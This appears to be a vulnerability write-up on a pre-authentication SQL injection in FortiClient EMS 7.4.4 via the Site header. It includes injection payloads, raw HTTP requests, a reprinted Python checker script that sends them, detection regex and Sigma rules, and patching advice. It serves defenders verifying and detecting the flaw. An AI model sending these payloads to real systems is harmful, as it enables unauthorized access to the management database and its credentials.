CVE-2026-21643: Critical Pre-Auth SQL Injection in FortiClient EMS 7.4.4

⚠ No Runnable Lab

Important Note for Researchers: Due to the proprietary nature of FortiClient EMS and the absence of official containerized images or Vulhub coverage for this specific component, this vulnerability cannot be reproduced in a standard Linux Docker lab environment. This blog post provides analysis and verification techniques for manual validation. Analysts wishing to reproduce this vulnerability must deploy the vulnerable software version (FortiClient EMS 7.4.4) in an isolated, controlled lab environment. Always adhere to your organization's testing policies and isolate network traffic to prevent accidental impact on production systems.

---

Executive Summary

CVE-2026-21643 represents a Critical security vulnerability in Fortinet FortiClient Enterprise Management Server (EMS) version 7.4.4. This flaw allows an unauthenticated attacker to perform SQL injection attacks against the underlying PostgreSQL database via the Site HTTP header.

With a CVSS v3.1 Base Score of 9.1, this vulnerability poses an immediate threat to enterprise security posture. The flaw enables database command execution without authentication, leveraging publicly accessible API endpoints. Fortinet has classified this vulnerability, and it has been included in the CISA Known Exploited Vulnerabilities (KEV) catalog, indicating active exploitation in the wild.

Key Risk Factors

• Severity: CRITICAL (CVSS 9.1).
• Attack Vector: Network/HTTP.
• Authentication: None (Pre-Authentication).
• Impact: Full database compromise, potential for remote code execution via database features, and exfiltration of sensitive data including administrator credentials, license keys, and client agent configurations.
• Target: FortiClient EMS 7.4.4.

Technical Deep Dive

Vulnerability Mechanism

FortiClient EMS utilizes a multi-tenant architecture where the Site HTTP header is expected to contain a tenant or site identifier to route requests and scope database queries. In version 7.4.4, the backend implementation fails to properly sanitize the Site header value before concatenating it into SQL commands.

The backend database is PostgreSQL, as evidenced by the reflection of database-specific error messages and the use of the pg_sleep() function in exploit payloads. The lack of parameterized queries or strict input validation allows an attacker to break out of the intended query context.

Attack Surface

The vulnerability affects two unauthenticated API endpoints:

1. /api/v1/init_consts: Initializes tenant configuration. This endpoint is ideal for error-based SQL injection because it reliably returns HTTP 500 responses with database error messages when triggered incorrectly.
2. /api/v1/auth/signin: Handles the authentication handshake. While pre-authentication, this endpoint is often protected by brute-force mitigations. It supports time-based blind SQL injection but carries a high risk of triggering account lockouts or IP blocks if misused.

SQL Injection Vectors

Error-Based Extraction (Safe Verification)

Targeting /api/v1/init_consts, an attacker can inject a payload that forces a type mismatch error in PostgreSQL. By casting a unique string to an integer, the database throws an error containing the injected value, which is reflected in the HTTP response body.

• Payload Pattern: '; SELECT CAST('<UNIQUE_STRING>' AS int)--
• Result: HTTP 500 with <UNIQUE_STRING> visible in the error body.

Time-Based Blind Injection (Risky Verification)

Targeting /api/v1/auth/signin, an attacker can inject a sleep command.

• Payload Pattern: '; SELECT pg_sleep(5)--
• Result: Response delay.
• Complexity: The environment may use PgBouncer (a connection pooler), which can duplicate queries, causing the sleep to execute twice (~10 seconds instead of 5). Additionally, the signin endpoint enforces rate limiting; repeated tests will likely lock the account or IP.

Potential Impact

Successful exploitation allows the attacker to:

• Read Arbitrary Data: Exfiltrate user credentials, license information, and internal configuration data.
• Write/Modify Data: Potentially alter EMS settings or inject malicious agent configurations.
• Lateral Movement: Use the database as a pivot point to attack other systems within the managed network.
• Denial of Service: Disrupt EMS availability by corrupting database state.

PoC Analysis

A community Proof of Concept (PoC) has been released demonstrating the pre-authentication SQL injection. This tool provides a practical method for verifying the vulnerability via both error-based and time-based techniques.

• Repository: https://github.com/alirezac0/CVE-2026-21643
• Author: Alireza
• Type: Python verification script.

Code Analysis

The PoC script (cve_2026_21643.py) implements a checker that targets the identified endpoints. Key features include:

1. Error-Based Check: Uses /api/v1/init_consts to safely verify vulnerability by looking for HTTP 500 responses containing a unique test string. This method avoids brute-force protections.
2. Time-Based Check: Uses /api/v1/auth/signin to measure latency differences. The script includes logic to account for PgBouncer duplication and warns users about account lockout risks.
3. TLS Handling: Disables certificate verification to handle self-signed certificates common in EMS deployments.
4. Safety Warnings: The script explicitly warns about the signin endpoint lockout behavior.

Exploit Code

#!/usr/bin/env python3
"""
CVE-2026-21643: FortiClient EMS 7.4.4 Pre-Auth SQL Injection
Author: Alireza
"""

import argparse
import requests
import urllib3
import time
from urllib.parse import urljoin

# Disable insecure request warnings (FortiClient EMS often uses self-signed certs)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

BANNER = """
\033[1;36m
  ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗  ██████╗ 
 ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗██╔════╝ 
 ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████╗ 
 ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ██╔═══██╗
 ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗╚██████╔╝
  ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝ ╚═════╝ 
                                                                
  ██████╗ ██╗ ██████╗ ██╗  ██╗██████╗ 
  ╚════██╗██║██╔════╝ ██║  ██║╚════██╗
   █████╔╝██║███████╗ ███████║ █████╔╝
  ██╔═══╝ ██║██╔═══██╗╚════██║ ╚═══██╗
  ███████╗██║╚██████╔╝     ██║██████╔╝
  ╚══════╝╚═╝ ╚═════╝      ╚═╝╚═════╝ 
\033[0m
\033[1;34m FortiClient EMS Pre-Auth SQLi Checker | Written by Alireza \033[0m
"""

def check_init_consts(base_url):
    """
    Checks the /api/v1/init_consts endpoint using error-based extraction.
    This is the safest method as it doesn't trigger account lockouts.
    """
    url = urljoin(base_url, "/api/v1/init_consts")
    # Attempting to cast a string to an integer to force a reflection in the PostgreSQL error
    payload = "x'; SELECT CAST('alireza_cve_2026_21643_test' AS int)--"
    headers = {
        "Site": payload,
        "Connection": "close"
    }

    try:
        print(f"[*] Testing error-based SQLi on {url}")
        response = requests.get(url, headers=headers, verify=False, timeout=10)
        
        if response.status_code == 500 and 'alireza_cve_2026_21643_test' in response.text:
            print("\033[1;31m[+] VULNERABLE!\033[0m The target is vulnerable to CVE-2026-21643 via init_consts.")
            print(f"    Error Leaked: {response.text.strip()}")
            return True
        else:
            print("\033[1;32m[-] NOT VULNERABLE.\033[0m The target did not return the expected SQL error.")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Connection error: {e}")
        return False

def check_signin(base_url):
    """
    Checks the /api/v1/auth/signin endpoint using a time-based payload.
    Warning: This endpoint locks out after 3 attempts.
    """
    url = urljoin(base_url, "/api/v1/auth/signin")
    # pgbouncer executes this twice, so pg_sleep(5) results in a ~10 second delay
    payload = "x'; SELECT pg_sleep(5)--"
    headers = {
        "Site": payload,
        "Connection": "close"
    }

    try:
        print(f"[*] Testing time-based SQLi on {url} (Warning: Subject to lockout!)")
        
        # Baseline request
        start_time = time.time()
        requests.post(url, headers={"Site": "default", "Connection": "close"}, verify=False, timeout=15)
        baseline = time.time() - start_time
        print(f"    Baseline response time: {baseline:.2f}s")

        # Payload request
        start_time = time.time()
        requests.post(url, headers=headers, verify=False, timeout=25)
        injected_time = time.time() - start_time
        print(f"    Injected response time: {injected_time:.2f}s")

        if injected_time > (baseline + 8): # Expecting ~10s delay
            print("\033[1;31m[+] VULNERABLE!\033[0m The target is vulnerable to CVE-2026-21643 via auth/signin.")
            return True
        else:
            print("\033[1;32m[-] NOT VULNERABLE.\033[0m No significant time delay detected.")
            return False

    except requests.exceptions.ReadTimeout:
        print("\033[1;31m[+] VULNERABLE!\033[0m The request timed out, indicating the pg_sleep() payload is executing.")
        return True

Exploitation Walkthrough

For security teams validating this vulnerability in a lab environment, follow these steps to safely verify the presence of CVE-2026-21643.

Prerequisites

• Target: FortiClient EMS 7.4.4 instance.
• Access: HTTPS access to the EMS management interface (Port 443).
• Tool: Python 3 with requests and urllib3.

Step 1: Error-Based Verification (Recommended)

This method is preferred as it minimizes the risk of triggering brute-force protections.

1. Send a request to /api/v1/init_consts with a crafted Site header.
2. Inject a payload that forces a PostgreSQL type error:

   GET /api/v1/init_consts HTTP/1.1
   Host: target-ems.local
   Site: '; SELECT CAST('TEST_VULN_2026' AS int)--
   

3. Inspect the response.
   • Vulnerable: HTTP 500 response containing the string TEST_VULN_2026 in the error body.
   • Not Vulnerable: Normal HTTP 200/400 response without the test string.

Step 2: Time-Based Verification (Use with Caution)

Only use this method if error-based verification is inconclusive and you are in a lab environment where lockouts are acceptable.

1. Send a baseline request to /api/v1/auth/signin to measure normal latency.
2. Send an injected request with a sleep command:

   POST /api/v1/auth/signin HTTP/1.1
   Host: target-ems.local
   Site: '; SELECT pg_sleep(5)--
   

3. Measure response time.
   • Vulnerable: Delay significantly exceeds baseline (expect ~10s due to PgBouncer duplication).
   • Not Vulnerable: Response time matches baseline.
4. Warning: Do not repeat this test more than necessary. The endpoint enforces lockout thresholds.

Step 3: Automated Verification

Run the PoC script against the target to automate detection:

python3 cve_2026_21643.py -u https://target-ems.local

Detection & Monitoring

While vendor-specific signatures are being updated, organizations can implement custom detection rules to identify exploitation attempts.

WAF / IDS Signatures

Monitor HTTP traffic for SQL injection patterns in the Site header targeting EMS endpoints.

Regex Pattern:

(Site.*?;\s*SELECT\s+(CAST|pg_sleep).*?--|Site.*?;\s*UNION\s+SELECT)

Sigma Rule Example

Create a Sigma rule to detect SQLi patterns in web server logs or WAF logs.

title: CVE-2026-21643 SQL Injection Attempt in FortiClient EMS
id: cve-2026-21643-detection
status: experimental
description: Detects SQL injection attempts against FortiClient EMS endpoints.
logsource:
    category: web_application
    product: fortinet_ems
detection:
    selection:
        http.request.header.Site:
            - '*SELECT CAST*'
            - '*SELECT pg_sleep*'
            - '*UNION SELECT*'
    condition: selection
level: high

Nuclei Template

Community Nuclei templates may become available. Search the Nuclei templates repository for CVE-2026-21643. Until then, manual verification is recommended.

Remediation Guidance

Immediate Actions

1. Patch: Update FortiClient EMS to the latest version released by Fortinet. Version 7.4.4 is confirmed vulnerable; verify the vendor advisory for the patched version.
2. Mitigate: If patching is not immediately possible, apply WAF rules to block requests containing SQL injection patterns in the Site header.
3. Isolate: Restrict access to EMS management interfaces to trusted management networks only. Do not expose EMS directly to the internet.

Long-Term Recommendations

• Follow CISA BOD 22-01 guidance for cloud and managed services.
• Implement network segmentation to protect the EMS database backend.
• Regularly audit web application firewalls and IDS/IPS signatures.

References

• CVE Details: CVE-2026-21643
• CISA KEV: CVE-2026-21643 on KEV Catalog
• Fortinet Advisories: Check Fortinet Support Portal
• PoC Repository: https://github.com/alirezac0/CVE-2026-21643
• NVD: NIST NVD Entry

---

Disclaimer: This blog post is for educational and defensive purposes only. Unauthorized testing of vulnerabilities is illegal. Always obtain proper authorization before testing any systems.